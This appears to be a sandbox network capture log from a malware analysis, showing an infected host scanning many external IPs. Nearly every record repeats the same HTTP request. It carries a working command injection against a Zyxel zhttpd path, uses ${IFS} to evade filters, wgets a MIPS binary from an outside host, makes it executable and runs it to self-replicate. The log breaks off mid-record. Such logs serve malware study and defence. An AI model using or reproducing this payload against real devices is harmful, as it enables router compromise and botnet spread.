                                                Jan 29, 2024 07:07:51.407941103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5126192.168.2.2342498125.114.167.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.407965899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5127192.168.2.2354166159.195.50.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408006907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5128192.168.2.235192048.236.136.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408037901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5129192.168.2.234531251.135.114.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408094883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5130192.168.2.2360454146.170.18.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408149004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5131192.168.2.2349052130.143.42.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408184052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5132192.168.2.233909298.71.105.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408240080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5133192.168.2.234858091.250.95.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408278942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5134192.168.2.233744447.191.240.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408303976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5135192.168.2.235274659.147.155.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408334017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5136192.168.2.2359964147.96.54.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408396959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5137192.168.2.2360824157.252.153.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408444881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5138192.168.2.2357996145.17.102.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408471107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5139192.168.2.236015076.249.91.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408513069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5140192.168.2.2360974180.33.217.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408538103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5141192.168.2.2345512194.102.223.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408571959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5142192.168.2.2340372155.117.34.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408610106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5143192.168.2.2353126150.91.252.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408658028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5144192.168.2.233495045.188.45.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408710957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5145192.168.2.2339242155.113.154.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408746958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5146192.168.2.234122676.114.121.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408787012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5147192.168.2.23410188.37.227.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408823967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5148192.168.2.233785685.217.100.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408858061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5149192.168.2.2334618192.120.157.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408905029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5150192.168.2.2339112176.0.247.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408948898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5151192.168.2.234041676.59.137.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408973932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5152192.168.2.2346216159.230.173.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.408999920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5153192.168.2.2341032141.21.188.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409056902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5154192.168.2.235554213.186.68.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409085035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5155192.168.2.2357808124.174.205.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409111023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5156192.168.2.234885268.140.124.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409164906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5157192.168.2.233803068.248.65.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409195900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5158192.168.2.235706094.151.27.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409249067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5159192.168.2.234918677.7.82.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409285069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5160192.168.2.2353762222.171.3.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409324884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5161192.168.2.2357344113.77.209.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409329891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5162192.168.2.2348224112.115.117.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409373999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5163192.168.2.234946478.108.74.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409411907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5164192.168.2.233486282.184.192.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409461021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5165192.168.2.2359488175.195.45.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409490108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5166192.168.2.233958818.230.57.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409562111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5167192.168.2.2350148148.42.102.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409563065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5168192.168.2.2339108145.221.6.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409621000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5169192.168.2.2341992175.136.211.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409652948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5170192.168.2.2348084143.27.129.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409687042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5171192.168.2.236017635.197.57.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409737110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5172192.168.2.233847069.90.75.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409785986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5173192.168.2.235162448.217.131.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409826994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5174192.168.2.235512279.217.46.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409893990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5175192.168.2.2360036204.243.105.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409935951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5176192.168.2.233970814.82.229.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409970999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5177192.168.2.234329464.219.2.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.409996986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5178192.168.2.2345136205.39.149.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410032988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5179192.168.2.235577652.123.193.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410095930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5180192.168.2.2333144173.11.96.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410135031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5181192.168.2.2346882209.148.0.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410161972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5182192.168.2.2338916104.206.112.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410188913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5183192.168.2.234059485.209.86.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410254955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5184192.168.2.2342782113.169.140.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410278082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5185192.168.2.234448090.252.61.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410299063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5186192.168.2.2360126194.231.219.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410336018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5187192.168.2.235581096.212.0.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410360098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5188192.168.2.23529449.21.103.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.410412073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5189192.168.2.2359064136.48.251.171443
                                                TimestampBytes transferredDirectionData
